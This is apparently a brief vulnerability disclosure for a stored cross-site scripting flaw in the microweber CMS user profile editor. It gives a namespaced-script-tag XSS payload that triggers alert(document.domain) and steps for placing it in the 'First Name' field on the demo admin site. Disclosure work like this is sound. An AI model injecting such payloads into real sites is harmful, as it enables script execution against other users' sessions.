Cross-site Scripting (XSS) - Stored in microweber/microweber
Jan 27th 2022
Stored XSS occurs when changing a user's profile
Proof of Concept
XSS POC : "><something:script xmlns:something="http://www.w3.org/1999/xhtml">alert(document.domain)</something:script> 1. Open the https://demo.microweber.org/demo/admin 2. Go to "Users" > "Edit profile" 3. Change the value of "First Name" to XSS PoC 4. Refresh
Through this vulnerability, an attacker is capable to execute malicious scripts.